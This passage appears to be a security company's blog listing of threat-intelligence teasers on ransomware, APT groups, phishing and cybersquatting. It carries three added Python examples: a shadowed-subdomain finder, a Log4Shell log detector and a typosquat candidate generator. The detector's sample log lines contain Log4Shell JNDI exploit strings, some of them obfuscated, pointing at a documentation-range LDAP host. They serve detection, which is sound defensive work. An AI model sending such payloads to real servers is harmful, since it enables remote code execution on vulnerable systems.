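    {"name": "example-bakery.com", "type": "MX", "rdata": "mail.example-bakery.com", "first_seen": "2019-05-02"},
]


def apex_of(name):
    """Registrable domain; assumes a one-label public suffix (use the PSL for co.uk etc.)."""
    return ".".join(name.lower().split(".")[-2:])


def find_shadowed(records, today_iso, recent_days=30, prefix=24):
    """Flag subdomains whose A record lands outside the apex's own netblock(s)
    and that were first seen within `recent_days` of `today_iso`.
    Returns sorted (name, ip) tuples."""
    today = date.fromisoformat(today_iso)
    by_apex = {}
    for r in records:
        if r["type"] == "A":
            by_apex.setdefault(apex_of(r["name"]), []).append(r)

    findings = []
    for apex, recs in by_apex.items():
        baseline_names = {apex, "www." + apex}
        # Netblocks where the legitimate site itself is hosted (assumption: /24 granularity).
        base_nets = {ip_network(f"{r['rdata']}/{prefix}", strict=False)
                     for r in recs if r["name"].lower() in baseline_names}
        if not base_nets:
            continue  # no anchor for the legitimate hosting, so nothing to compare against
        for r in recs:
            if r["name"].lower() in baseline_names:
                continue
            ip = ip_address(r["rdata"])
            off_net = not any(ip in net for net in base_nets)
            age_days = (today - date.fromisoformat(r["first_seen"])).days
            if off_net and age_days <= recent_days:
                findings.append((r["name"].lower(), r["rdata"]))
    return sorted(findings)


if __name__ == "__main__":
    for name, ip in find_shadowed(SAMPLE_PDNS, "2022-06-30"):
        print(f"possible shadowed subdomain: {name} -> {ip}")
```

In the sample, `mail.example-bakery.com` is old and sits in the apex's netblock, so it is ignored, while the two subdomains that appeared in June 2022 on a different /24 are flagged. Treat the output as a lead for analysts, not a verdict: legitimate CDN or SaaS subdomains also resolve off-net, so the next step is to check registrar account activity and the subdomain's content.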
Eternity, also known as the "EternityTeam" or "Eternity Project," has been active since January 2022 and tied to the Jester Group. It gained infamy for using the as-a-service subscription model to distribute its own brand of malware modules via underground forums. more
Cyber jihad loosely refers to Islamic extremist terrorists' use of the Internet as a communications, fundraising, recruitment, training, and planning tool in their war against their enemies. Some of their most commonly cited enemies include the U.S., Western European countries, secular Arab governments, and Israel. more
BlackEnergy first appeared in 2007. Designed to launch distributed denial-of-service (DDoS) attacks or download customized spam or banking data-stealer plug-ins, it was again used to target the State Bar of Georgia last May. more
Malicious spam, possibly the oldest kind of cyber threat, likely remains one of enterprises' biggest security concerns. Regardless of form and affected device, clicking a malicious link embedded in a spam email or downloading a malware-laden attachment can lead to financial, data, or identity theft. more
The Syrian Electronic Army (SEA) is a group of threat actors that have been around since 2011. Some of their possible victims are PayPal, eBay, Twitter, media outlets, and some U.S. government websites. more
The Russian Business Network (RBN) claimed to be a legitimate Internet service provider (ISP) back in 2006. Shortly after establishing its business, however, it gained notoriety for hosting the sites owned by spammers, malware operators, distributed denial-of-service (DDoS) attackers, and other cybercriminals. more
WhoisXML API threat researcher Dancho Danchev obtained a publicly accessible list of email addresses known to be owned and used by Iranian hackers. The email addresses led us to more than 4,400 domain names, any of which can be weaponized and used in phishing, credential theft, and other forms of cyber attacks. more
GitHub is a popular code repository widely used by software developers. Anyone can access it to share their code with practically anyone interested. Unfortunately, not every GitHub user is trustworthy. It has, in fact, been used to host malware at least a couple of times. more
The Maze Ransomware Group is one of the most notorious threat actor groups targeting large enterprises, such as Cognizant, Xerox, and Canon, and stealing massive amounts of sensitive data. Some of their ransomware distribution methods include spamming, phishing, and brute forcing. more
In 2018, nine Mabna hackers were indicted by a U.S. grand jury for their involvement in different instances of cybercrime. Their victims included about 320 universities and over 50 private, government, and nongovernmental organizations in several countries. more
The Democratic National Committee (DNC) breach was a high-profile cyber attack in recent history. Years later, the cybersecurity community can still benefit from insights and actionable intelligence relevant to the attack. In line with this, WhoisXML API threat researcher Dancho Danchev dove deep into the DNC system intrusion using publicly available indicators of compromise (IoCs). We further enriched his findings, allowing us to uncover: more
Anything conveniently obtainable online is often ripe for cybercriminal picking, and that's certainly true for the most commonly used software. We can't live without them, after all, if we are to thrive and not just survive in the digital world. more
Age is rarely an issue when it comes to malware campaigns, and that's certainly true for WebAttacker. WebAttacker is a do-it-yourself (DIY) malware creation kit that became popular back in 2006. It was the first exploit kit made available to cybercriminals in the Russian underground market for as little as US$20. more
The infamous gray hat security company Ashiyane Digital Security Team went back online in 2021. At that time, WhoisXML API threat researcher Dancho Danchev exposed more than 100 domains belonging to the group. This analysis was recently expanded to further explore the Iran-based threat group's Internet-connected infrastructure. more
Pay-per-install (PPI) businesses and affiliate networks made for a booming cybercriminal underground market from 2008 to 2013. Buoyed by the proliferation of fake antivirus (FakeAV) peddlers, operators made staggering profits from the sale of rogue security software. more
Early last July 2022, news broke out about the arrest of a CEO who allegedly sold fake Cisco networking devices. While he used e-commerce sites as sales channels, the idea that counterfeit products are also peddled through cybersquatting domains is not too far-fetched. more
We tracked the digital spillovers of the Russia-Ukraine war two weeks after it began and saw how the news was reflected in domain registrations. We also noticed that even this year’s Oscars slapping incident drove relevant domain registrations. more
The public attention COVID-19 got was truly reflected in the Domain Name System (DNS). And monkeypox seems to be following the trail the pandemic blazed, though to a smaller extent, as threat actors seem to be using it as the latest phishing lure. How has this new virus been affecting domain registration? more
AAAA and PTR records were added to WhoisXML API's DNS Database Download's existing pool of six DNS record types (i.e., A, MX, NS, TXT, CNAME, and SOA records). All these records are now updated daily, making the database more up-to-date and relevant in supporting security processes. more
A financially motivated threat group called "Roaming Mantis" was seen targeting Android and iOS device users through malicious SMS communications. The messages sent Android phone users to download pages while iOS users were redirected to credential-stealing login pages. more
Agent Tesla, an infamous data stealer, has been plaguing Internet users since 2014. Much has been revealed about the malware, but the world didn't come to know about one of its more adept campaign perpetrators -- Hagga -- until last year. more
Months after TikTok launched its marketplace in September 2021, several users have raised concerns about the authenticity of the products they purchased. The complaints mainly pertain to beauty products, such as sunscreens, lip glosses, and makeup brushes. Aside from being ripped off, consumers may be exposed to more danger. more
A group of researchers recently discovered a new Android banking Trojan they called "Revive" since threat actors designed it to restart if it stops working. Once a device is infected, hackers can intercept messages, including online banking one-time passwords (OTPs). Revive also enables attackers to steal login credentials since it can read and store everything the user types on the infected device. more
Scammers and counterfeiters are always on the lookout for quick gains. And the more expensive the fake item, the bigger the possible gain. It’s no wonder then why they’re looking to mimic the world’s most popular luxury jewelers. more
The Koobface Gang gained notoriety from 2008 to the 2010s for spreading malware via Facebook and other social networks. Believe it or not, the gang amassed millions of dollars from their online scams while hiding in plain sight in St. Petersburg, Russia. After being publicly identified in 2012, the gang members shut down their operations. more
Aoqin Dragon, like the mythical character it's named after, has recently been unearthed after nearly a decade of flying under the cybersecurity community's radar. Now believed to have been active since 2013, the advanced persistent threat (APT) group has targeted various organizations in the government, education, and telecommunications sectors. more
For US$2,500, threat actors can employ Matanbuchus, a malware-as-a-service (MaaS) package found delivering Cobalt Strike beacons through phishing and spam messages. Cobalt Strike is a powerful security tool that threat actors are increasingly using as a reconnaissance and post-exploitation weapon. more
Threat actors are increasingly impersonating businesses in phishing attacks. In May 2022, 52% of business email compromise (BEC) scams impersonated third-party organizations, exposing businesses to supply chain attacks. more
Conti ransomware surfaced as far back as 2020. Believed to have been created by Russia-based cybercriminal group Wizard Spider, it has been involved in a multitude of double extortion campaigns over the years. more
As technology advances, so does the world of espionage. That has given birth to several companies, such as Cytrox, that specialize in creating spyware. Predator, along with other applications of its kind, has been advertised as legal spyware-for-hire. more
Two cyber threats recently caught the attention of WhoisXML API researchers, primarily since parts of their infection chain hide behind legitimate services. This tactic is tricky for security teams because blocking the domains involved means blocking legitimate applications, too. more
Cyber attackers typically use newly registered domains (NRDs) in their campaigns to evade detection, particularly since the implementation of privacy protection in WHOIS records. But some also use aged domains like the SolarWinds hackers to render a sense of legitimacy to their pages. more
Phishing emails impersonating Maersk, one of the largest container shipping companies, have targeted more than 18,000 people since the beginning of the year. The sender address imitated the legitimate company's email address, and the message led to a phishing page designed to look like Maersk's shipping portal login page. more
Premium Short Message Service (SMS) abuse is no longer new. But it's pretty rare for such threats to rack up hundreds of dollars in additional phone bill costs for every victim each year. more
Threat actors don't rest. Their malicious campaigns operate 24/7, especially when special occasions are approaching. Last May, we discovered over a thousand web properties related to Mother's Day, many of which either hosted questionable content or have been flagged as malicious. more
In an earlier post, we looked at how cybersquatters took advantage of the popularity of seven car manufacturers to lure unwitting victims to fake sites. Since then, we were alerted to a phishing campaign this time targeting several German car dealers via age-old but still effective phishing. more
In the past, security experts typically made a distinction between a cybercrime and an advanced persistent threat (APT). While cybercrime focused on obtaining financial gain, APTs set their sights on specific organizations, often to steal nation-state secrets. more
AliExpress is among the most visited business-to-customer (B2C) e-commerce sites globally, with millions of visitors daily. Therefore, a recent cybersquatting campaign targeting the platform could lure many victims into buying counterfeit products, divulging their login credentials, downloading malware, and many other actions that could jeopardize their data and devices. more
When Facebook changed its parent company name to Meta in October 2021, we detected more than 5,500 newly registered domains (NRDs) a week after the announcement. In more recent news, a judge dismissed the company's cybersquatting and trademark infringement case against Namecheap. more
There's a new phishing-as-a-service (PhaaS) solution in town, and it's called "Frappo." This new phishing toolkit enabled threat actors to launch impersonation attacks on at least 19 companies in the financial, entertainment, and telecommunications industries. more
Twitter was recently abuzz with news regarding an ongoing Cardano scam via a downloadable phishing app. Posing as a giveaway promo, which is how cybercriminals have frequently been victimizing cryptocurrency owners these days, the rogue app leaves users who are tricked into downloading it with stolen credentials instead. more
Non-fungible token (NFT) companies like Dapper Labs and Yuga Labs were recently seen performing defensive domain registration. While this strategy is only a part of a broader brand protection program, large companies in other industries implement it as well. more
Threat actors the world over have long been employing website defacement as a tactic to further their political, environmental, or even personal agenda. They essentially replace the content of target sites to display their messages through various means, including SQL injection, cross-site scripting (XSS), and other initial compromise techniques. more
Fake news and disinformation have been significant issues for some time now, even urging the U.S. government to push back against proliferators who, some opine, do the malicious deed for political or financial gain. Amid this scenario, many have begun doubting what's real and what's not on the Web not just in the U.S. but worldwide. more
The Internet has been abuzz with talks about Elon Musk buying Twitter since he made an initial offer of US$44 billion on 14 April 2022. The even bigger news? Twitter accepted the offer despite some employees' qualms about Musk's future plans for the company. more
The NSO Group has been known for targeting dissident journalists and bloggers notably with its proprietary spyware Pegasus. In November 2021, for instance, Apple sued the NSO Group for its alleged surveillance and targeting of its device users. more
Sinkholing has long been employed as an effective cybersecurity solution to curb the spread of dangerous malware. Remember the infamous WannaCry ransomware outbreak in 2017? Security teams put a stop to the threat through sinkholing. more
We're supposed to spoil our mothers on Mother's Day, but with various scams out there, you may end up losing money or with a malware-infected device. WhoisXML API researchers found more than a thousand digital properties that could be used in Mother's Day scams. more
On 9 March 2022, the Cybersecurity and Infrastructure Security Agency (CISA) added 98 indicators of compromise (IoCs) to their Conti ransomware alert page. WhoisXML API researchers examined these flagged domain names for recurring characteristics to uncover more artifacts. more
HermeticWiper, a data wiper that surfaced alongside the related IsaacWiper and renders infected computers useless, has reportedly affected hundreds of Ukrainian users since it appeared. While a few cybersecurity specialists have publicized indicators of compromise (IoCs) related to the ongoing campaigns, we found more connected web properties that users may need to steer clear of to avoid becoming the next victims. more
Operation Dream Job, a malicious campaign first seen in 2020, involves threat actors spoofing job hunting sites to lure people. It resurfaced in February 2022, this time exploiting a zero-day vulnerability in Google Chrome for more than a month before the flaw was detected and a patch was made available. more
APT36 or Earth Karkaddan is an advanced persistent threat (APT) actor group targeting various government entities, most especially those based in India. The web properties they use for campaigns include only a few domains and IP addresses along with related malware hashes as indicators of compromise (IoCs). more
The International Committee of the Red Cross (ICRC) hack in January 2022 led to the compromise of the sensitive information belonging to 515,000 people. While no indicators of compromise (IoCs) relevant to the attack have been publicized, a security researcher did expose a possible link to an Iranian misinformation network. more
Cybercriminal network Innovative Marketing made headlines in rogue scareware's heyday. Between its founding in Kyiv, Ukraine, in 2009 and the three years it continued operating, the company reportedly amassed close to US$700 million in revenue. more
In addition to batch data feeds, real-time APIs, and web-based GUIs, WhoisXML API now delivers domain intelligence through data streaming. With the new delivery model, the company provides the data to users as soon as they are made available and processed at an interval of 1 hour or less. more
The U.S. tax season began when the Internal Revenue Service (IRS) started accepting and processing 2021 tax returns on 24 January 2022. The deadline is set for 18 April 2022, and taxpayers expect to receive email notifications regarding penalties, refunds, and other tax-related issues. more
Distinguishing properties added by the companies themselves is an essential part of this study. If the legitimate company owns the domains and subdomains, it has control over those assets. Otherwise, the digital properties can be considered rogue and could potentially be used in brand abuse, phishing campaigns, and other malicious activities. more
It's not unusual for movies, actors, and actresses to serve as lures in cyber attacks. Our recent post on "Spider-Man: No Way Home" proved that. Phishers and other threat actors will, unfortunately, try to capitalize on anything that's bound to get a lot of user attention. And the annual Oscar Awards is no stranger to such a scenario. Just last year, in fact, hackers used nominated films as phishing baits. This year may be no different. more
Check Point researchers identified DHL as the most-imitated brand in phishing campaigns at the end of 2021. We sought to find out if that will remain the case this year by looking at various intelligence sources. more
Threat actors have notoriously taken advantage of the Olympic Games' popularity to launch malicious campaigns. The "OlympicDestroyer" malware was most notable, using a domain related to the Pyeongchang 2018 Winter Olympics. But the COVID-19 bubble in the 2022 Olympic Winter Games may have increased the danger. more
Romance-themed malicious campaigns are launched throughout the year, but days leading up to Valentine’s Day could be particularly timely for such activities. more
Many countries celebrate Data Privacy Awareness Week every last week of January. Each year, the National Cyber Security Alliance (NCSA) makes it a point to remind users about the importance of keeping their digital data safe from all kinds of threat actors. In fact, they commemorated this year's Data Privacy Awareness Week with various events. more
BlackTech, an APT group known for cyber espionage activities targeting Asia, was recently detected using a new malware called "FlagPro." NTT Security named some indicators of compromise (IoCs) related to the new campaign, including five IP addresses and two subdomains. more
Ransomware has been one of the biggest threats to Internet users the world over since the malware first surfaced. REvil was one of the most notorious ransomware variants of 2021, pushing the U.S. Department of State to offer a US$10 million reward to anyone who can name and locate REvil gang leaders and up to US$5 million for any of their affiliates in November. more
Non-fungible token (NFT) scams can come in various forms, but one thing is sure: the threat actors behind them often use domain names, fake websites, and phishing emails. more
Given the dangers that COVID-19 poses to people's health and the emergence of new variants every so often, it's easy to see why avid moviegoers would resort to streaming instead. But while they may indeed be avoiding the disease, their attempts to download pirated movies are not only illegal -- they could put their computers at risk. more
Zloader, a banking malware that steals sensitive user data, is back with a more sophisticated infection chain. It evades detection while exploiting Microsoft's digital signature verification method. more
Giving gifts the whole year round is normal, but a whole boatload of presents are bought and sold most especially during Christmas and holiday seasons. The end-of-year holidays, unfortunately, also usher in the greatest number of gift card scams. But the world's biggest brands are no longer newbies to the threat, which is why Amazon, iTunes, and Target, among many others, have put up pages where scam victims can report malicious sites and pages. more
A zero-day vulnerability in Log4j, a logging library commonly used in Java applications, was publicly disclosed on 9 December 2021. The vulnerability, known as CVE-2021-44228 or "Log4Shell," lets attackers execute arbitrary code remotely on a vulnerable machine and access the data on it. more
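Because Log4Shell fires when user-controlled text reaches a log statement, the attack string (`${jndi:ldap://...}`) usually shows up in web access logs, in the User-Agent, query string or other headers, and attackers hide it with nested lookups such as `${lower:j}` or `${::-j}` that Log4j resolves before the jndi lookup runs. The following detection routine is an added example for this page, not code from the original post; the access-log lines are constructed, the addresses are documentation ranges, and the set of obfuscation forms it unwraps (`lower`, `upper`, `${x:-y}` defaults, plus URL encoding) is an assumption that covers the commonly seen variants rather than every possible one.

```python
import re
from urllib.parse import unquote

# Lookup forms that Log4j 2 resolves before the jndi: lookup runs
# (${lower:x}, ${upper:x}, ${env:UNSET:-x}, ${::-x}); attackers nest them
# inside the payload so that a naive "${jndi:" match never sees it.
_INNER_LOOKUP = re.compile(
    r"\$\{(?:(lower|upper):([^${}]*)|[^${}]*:-([^${}]*))\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(payload):
    """Resolve innermost lookups repeatedly until the string stops changing."""
    def resolve(m):
        if m.group(1):  # ${lower:x} / ${upper:x}
            return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()
        return m.group(3)  # ${anything:-x} evaluates to the default x

    prev = None
    while prev != payload:
        prev = payload
        payload = _INNER_LOOKUP.sub(resolve, payload)
    return payload


def is_jndi_probe(line):
    """True if the URL-decoded, de-obfuscated line carries a ${jndi: lookup."""
    return _JNDI.search(normalize(unquote(line))) is not None


def scan(lines):
    """Indices of lines that look like Log4Shell probes."""
    return [i for i, line in enumerate(lines) if is_jndi_probe(line)]


# Constructed access-log lines (example data; 198.51.100.0/24 is a documentation range)
SAMPLE_LINES = [
    '198.51.100.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.5:1389/a}"',
    '198.51.100.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://198.51.100.5:1389/a}"',
    '198.51.100.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.5/x}"',
    '198.51.100.9 - - "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.5%2Fa%7D HTTP/1.1" 200 "-"',
    '198.51.100.9 - - "GET / HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for i in scan(SAMPLE_LINES):
        print(f"line {i}: {SAMPLE_LINES[i]}")
```

The first four sample lines are flagged and the plain browser request is not. A filter like this is for triage and hunting in logs already collected; it does not prevent exploitation, since other lookup forms can still evade a pattern, and the fix is to upgrade Log4j rather than rely on log-side matching.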
Threat actors reportedly attacked 29 government agencies worldwide in a recent malicious campaign. The attacks were attributed to China-based advanced persistent threat (APT) group Nickel, which has been known to train its sights on governments and nongovernmental organizations (NGOs) across Europe, the Americas, and the Caribbean. more
It’s not uncommon to see free web hosting providers get abused as part of phishing campaigns. IBM X-Force Exchange, in fact, published three indicators of compromise (IoCs) related to such an incident. more
The ability to retrieve historical WHOIS information can be essential for the cybersecurity community, particularly when it comes to threat hunting and cybercrime investigation. This investigative capability is highlighted in our latest downloadable white paper "Digging Up Zombie Domains: What WHOIS History Reveals about 3,800+ Verified Phishing Hosts" where we analyzed thousands of verified phishing hosts and their historical WHOIS records. more
The November 2021 PhishLabs Quarterly Threat Trends & Intelligence Report identified the finance, social media, and telecommunications industries as phishers' most targeted sectors. Last month, we analyzed a squatting campaign targeting U.S. Bancorp to determine if other banks were at risk. This time, we look into the third most targeted industry, telecommunications. more
Locky has been around since 2016, contributing to the total amount lost to ransomware, which has to this day reached an estimated US$20 billion. It usually gets delivered to users' computers via emails with malicious attachments in the form of macro-laden Word documents. more
Facebook CEO Mark Zuckerberg, on 28 October in Connect 2021, introduced Meta, which will be Facebook’s parent company, along with the organization’s various apps and technologies. According to Zuckerberg, "Meta’s focus will be to bring the metaverse to life and help people connect, find communities, and grow businesses." more
A typosquatting campaign targeting U.S. Bancorp was uncovered a few weeks ago, potentially posing a threat to the financial institution and its customers. As of this writing, four domains and their IP resolutions were identified as indicators of compromise (IoCs). more
An ongoing cybersquatting campaign targeting MetLife, a global insurance company, was reported by IBM X-Force Exchange, listing 12 malicious domains. We dug deeper into the campaign as part of our goal to expand lists of indicators of compromise (IoCs). more
Details about an ongoing cybersquatting campaign targeting Turkish Airlines were recently unveiled, naming 13 malicious domains connected to the threat. As one of our primary goals is to expand published lists of indicators of compromise (IoCs), we dug deeper into the campaign to determine if the threat is confined to Turkish Airlines or if other industry players are at risk as well. more
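The U.S. Bancorp, MetLife, and Turkish Airlines posts above, like the earlier AliExpress one, all start from a handful of published squatting domains and ask whether more exist. The usual way to widen that search is to generate the permutations a squatter would register for a brand (character omissions, transpositions, homoglyphs, hyphenation, keyword affixes, TLD swaps) and match them against a newly registered domain feed. The block below is an added example written for this page, not code from the original posts or from WhoisXML API's products; the substitution tables, keyword list, TLD list and the sample feed are constructed assumptions, and MetLife is used only as the worked brand.

```python
# Constructed substitution tables (assumptions, not data from the original posts)
HOMOGLYPHS = {"l": ["1", "i"], "i": ["1", "l"], "o": ["0"], "e": ["3"],
              "a": ["4"], "s": ["5"], "m": ["rn"], "w": ["vv"]}
KEYWORDS = ["login", "secure", "account", "support", "verify"]
TLDS = ["com", "net", "org", "co", "info"]


def split_domain(domain):
    """Split 'label.tld' into (label, tld); assumes a single-label suffix."""
    label, _, tld = domain.lower().strip().rpartition(".")
    return label, tld


def label_variants(label):
    """Second-level label permutations a squatter is likely to register."""
    variants = set()
    for i in range(len(label)):                       # omission: metlfe
        variants.add(label[:i] + label[i + 1:])
    for i in range(len(label) - 1):                   # transposition: mtelife
        variants.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])
    for i in range(len(label)):                       # repetition: mettlife
        variants.add(label[:i] + label[i] + label[i:])
    for i, ch in enumerate(label):                    # homoglyph: met1ife, rnetlife
        for sub in HOMOGLYPHS.get(ch, []):
            variants.add(label[:i] + sub + label[i + 1:])
    for i in range(1, len(label)):                    # hyphenation: met-life
        variants.add(label[:i] + "-" + label[i:])
    for kw in KEYWORDS:                               # keyword affixes: metlife-login
        variants.update({f"{label}-{kw}", f"{label}{kw}", f"{kw}-{label}"})
    variants.discard(label)
    return variants


def squat_candidates(domain):
    """Full candidate set: every label variant under every TLD, plus TLD swaps."""
    label, tld = split_domain(domain)
    out = {f"{v}.{t}" for v in label_variants(label) for t in TLDS}
    out.update(f"{label}.{t}" for t in TLDS if t != tld)   # TLD swap: metlife.net
    return out


def match_feed(domain, feed):
    """Domains from a registration feed that fall in the candidate set, sorted."""
    cands = squat_candidates(domain)
    return sorted(d.lower() for d in feed if d.lower() in cands)


# Constructed sample of a newly registered domain feed (not real registrations)
SAMPLE_FEED = ["metlfe.com", "MetLife-Login.net", "example.org", "met1ife.com", "bakery.co"]

if __name__ == "__main__":
    for hit in match_feed("metlife.com", SAMPLE_FEED):
        print("possible squat:", hit)
```

Against the sample feed, three of the five entries match. The candidate set is deliberately generous (a seven-letter brand across five TLDs yields several hundred names), so in practice you would follow a match with WHOIS and DNS lookups to separate defensive registrations owned by the brand from rogue ones, which is the same ownership check the posts describe.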
There are several directions an organization can take when naming critical digital properties. A classic tactic is using a common theme, such as pet names, planets, or colors. A CTO suggested naming database nodes after “Game of Thrones (GoT)” characters. Taking this route makes for an obscure naming system that would be difficult for third parties to guess. more
Kaseya, an IT solution developer serving managed service providers (MSPs) and enterprises, became the victim of a massive ransomware attack last July. While the company's CEO said that less than 0.1% of its clients were affected, because it mostly serves MSPs, data belonging to as many as 1,500 small businesses could have been compromised. more
According to recent research conducted by DNS Threat Researcher Dancho Danchev, the National Security Agency (NSA) seemingly runs a free VPN domain portfolio to lure malicious users and learn more about their Internet activities. more
It’s not uncommon to see news stories that blame piracy or prerelease leakages for poor movie revenue turnouts. We’ve seen that happen over time with movies like “X-Men: Origins Wolverine,” “Star Wars: Episode III: Revenge of the Sith,” and “Expendables 3.” more
The video game industry outperformed the movie and North American sports industries in 2020, and market experts expect the trend to continue in 2021. Reports about increasing cyber attacks targeting the industry are therefore not surprising, as threat actors tend to go after lucrative targets. more
The Phorpiex botnet has been operating for years now. It first focused on distributing old-school worms that spread via infected USB drives or through chats that relied on the Internet Relay Chat (IRC) protocol. more
The Hafnium attacks targeting Microsoft Exchange Server vulnerabilities triggered several cybersecurity investigators and researchers to hunt for other threat actors that use similar attack methods. Among them is the Cybereason News Network. more
As an attack vector, phishing has had several underlying purposes – e.g., delivering malware, stealing sensitive information, and defrauding victims. However, it looks like most phishing emails could be used to obtain user credentials according to the 2021 Annual State of Phishing Report by Cofense. more
Conficker gained prominence back in 2008, when it was then considered possibly the most widespread worm affecting millions of Windows computers worldwide. For several years, the worm, also known as "Downup," "Downadup," "Downad," or "Kido," was the top malware infector. more
June 2021 saw the U.S. Department of Justice (DOJ) shutting down and seizing several websites believed to be involved in misinformation campaigns. These websites published news-related content and seemingly had connections to Iranian governmental entities. In fact, some of them were found to be the property of the Iranian Islamic Radio and Television Union (IRTVU). more
WhoisXML API recently launched a white-label variant of its Brand Monitor solution so more organizations can offer domain brand protection and marketing services under their own label. more
A recent study of CEO impersonation showed that phishing in its various forms is a threat not just to the world's top companies but also to the top CEOs. more
Domain attack surface discovery is a continuous quest for domain and subdomain names that could be used as attack vectors. The larger its attack surface, the more vulnerable an organization tends to be. On the other hand, the more attack vectors discovered, the higher the chances of mitigating cyber attacks. more
The Domain Research Suite (DRS) has been helping organizations search for relevant domain data and monitor web properties and registrants of interest for years now. To continue to support this effort, a white-label version of DRS is now available to vendors so they can help their own roster of clients improve their brand protection strategies, among other use cases. more
Pride month is celebrated worldwide. While it's meant to be a time of celebration for members of the LGBTQ community and their families and supporters, its popularity has also made it a possible target of cyber threats. In this post, we look at potentially dangerous Internet properties that have been registered both recently and over the years. more
While Office 365 is one of the most prevalent office suites out in the market today, its users can't rest easy. Cybercriminals and threat actors will always find ways to abuse the most popular brands in various ways. more
It has been months since Joe Biden and Kamala Harris took office as president and vice president of the U.S., respectively, and since that time they have naturally been featured in most news outlets. What we wanted to know, though, is how all the attention has been affecting the domain registration world. more
The U.S. government released the Executive Order on Improving the Nation's Cybersecurity in May 2021, highlighting the rationale of a zero-trust security approach. While the order only covers the government's digital infrastructure, this initiative could also serve as a catalyst for more robust global cybersecurity. more
The release of a new application or operating system (OS) is typically greeted by enthusiasm, diverse opinions, and potential threats. Windows 11's case is no different as we identified various assets that could be misused on the Internet. more
Web categorization engines and related tools are built to help organizations classify websites they do business or generally interact with. WhoisXML API's Website Categorization API and Website Categorization Lookup can be used to classify websites into 25 possible categories. more
Liberty Front Press is a fake news network that has been operating since Trump's administration and was said to be designed to leverage liberal resentment against the former U.S. president while promoting pro-Iranian foreign policy narratives via social media. more
The Pareto botnet, known for using almost a million infected Android devices to spoof people seemingly watching ads on smart TVs, was reportedly taken down recently through the collaboration of industry players, notably Roku and Google. more
The 2016 U.S. elections sparked a lot of controversies, as several law enforcement agents and security researchers believed countries like Russia may have greatly influenced its turnout. We sought to find out more about it via an OSINT analysis using various domain and IP intelligence tools. more
WhoisXML API's repository of historical Domain Name System (DNS) lookup records continues to grow in volume and coverage. The DNS database download service has recently been expanded to now include six types of DNS databases. more
Telecommunications companies are a favored cyberattack target. After all, telcos build, control, and operate critical infrastructure that almost everyone uses to communicate. They also store large amounts of sensitive data that could easily be exploited when falling into the wrong hands. more
Emotet traces its origin as far back as 2014, when its simplest form as a banking Trojan first made the headlines. Over the years, its creators have constantly improved the malware, a popular malware-as-a-service (MaaS) offering in cybercriminal underground fora. more
Content streaming services are no stranger to cyberattacks, and the recent Spotify squatting campaign reported by IBM X-Force Exchange is proof of that. Spotify, however, is not alone on the boat, as many other streaming services have fallen prey to attacks over the years. more
On 14 May 2021, Analyst1 security researchers released a detailed report on the DarkSide cybercriminal gang, which is believed to be responsible for ransomware attacks targeting the Colonial Pipeline. The report included several indicators of compromise (IoCs), specifically 41 malware hashes, two domains, and three IP addresses. more
ZeuS malware traces its origin as far back as 2006, when it was used to steal victims' online banking credentials. In 2011, its source code was leaked on a file-sharing site and quickly spread throughout various underground fora. more
Intranets are by definition meant for internal use only -- employee communication, content management, and the like. They are part of the Deep Web where search engines can't index sites, and unauthorized people shouldn't be able to access them. more
Many reports have released indicators of compromise (IoCs) regarding the Endless Mayfly disinformation campaign. But for those who don't know what it is, Endless Mayfly uses fake social media accounts and media websites to spread false information that has to do with U.S., Israel, and Saudi Arabia relations. more
On any given day, most of us get more emails that we won't read than ones that we will. Many of these messages will remain unread and be sent to the trash. Then there is a third category of emails: those we wish we hadn't read and acted upon because they are bound to be malicious, sent by cybercriminals trying to lure you into one of their scams. more
Cryptocurrencies keep making waves in the online community, making them prime vehicles of threat actors in scam, phishing, and other malicious campaigns. Fraudsters, for one, have stolen millions of dollars worth of cryptocurrencies from investors through websites that promise rewards, giveaways, and earning opportunities. more
A threat actor reportedly infiltrated the network of and stole data from a financial institution about a month ago by exploiting one of four Microsoft Exchange Server vulnerabilities -- CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, or CVE-2021-27065. While patches for all of these have been released, users who have not downloaded and installed them could remain at risk. more
Threats can come from anywhere, even from legitimate hosting infrastructure. In fact, many cybercriminals often host their command-and-control (C&C) servers in known hosting providers' networks, sometimes those that offer bulletproof hosting services, to evade detection and consequent blocking. more
Magecart-style attacks have been around for a while and continue to be mentioned in the news in 2021. We found and collected a list of 20 domain names that have been mentioned in the past months on VirusTotal as Magecart indicators of compromise (IoCs). more
Addressing Domain Name System (DNS) abuse has been a priority of the Internet Corporation for Assigned Names and Numbers (ICANN), notably since March 2020. During its 70th conference, the organization's members talked about creating a web page defining DNS abuse-related terms, which should be updated over time, to help users report cases. more
The accidental leak of Volkswagen's new name that turned out to be an April Fool's prank made headlines. Some were relieved that it was just a marketing stunt, while others cried foul. But those in the field of cybersecurity became more curious. What did the cyber world look like during the supposed leakage until the announcement that it was a prank? more
Typosquatting can enable a variety of cyber threats that include but are not limited to phishing, malware-enabled attacks, and vulnerability exploitation. In a nutshell, the attackers can rely on the technique to mimic legitimate solution and service providers' domains to trick users into thinking they are getting update notifications from their vendors, for example, when they are actually not. more
Did you know that a comprehensive subdomain database can give you 69,383 fully qualified domain names (FQDNs) with the string "firewall," 241,654 FQDNs for "cctv," and 19,048 FQDNs for "scada"? That data can give cybersecurity researchers possible starting points for an article or even a full-blown research paper. more
In the past years, threat actors have made it a point to prey on U.S. taxpayers using phishing emails supposedly from the Internal Revenue Service (IRS). The goal is often to trick victims into giving their login credentials to various platforms. This year is no different. more
On 13 March, IBM X-Force Exchange published nine artifacts -- three domain names and six IP addresses -- related to a squatting campaign targeting JPMorgan Chase and its stakeholders. We dug deeper into the list in hopes of publicizing additional artifacts that users may need to be wary of. more
Kozow[.]com hosts the website of free dynamic Domain Name System (DNS) service provider Dynu Systems. It has been cited for ties to several malicious activities over the past few months. To see if it would be a good idea for organizations to consider blocking the domain from their networks, we collated a list of kozow[.]com subdomains and subjected them to deeper scrutiny. more
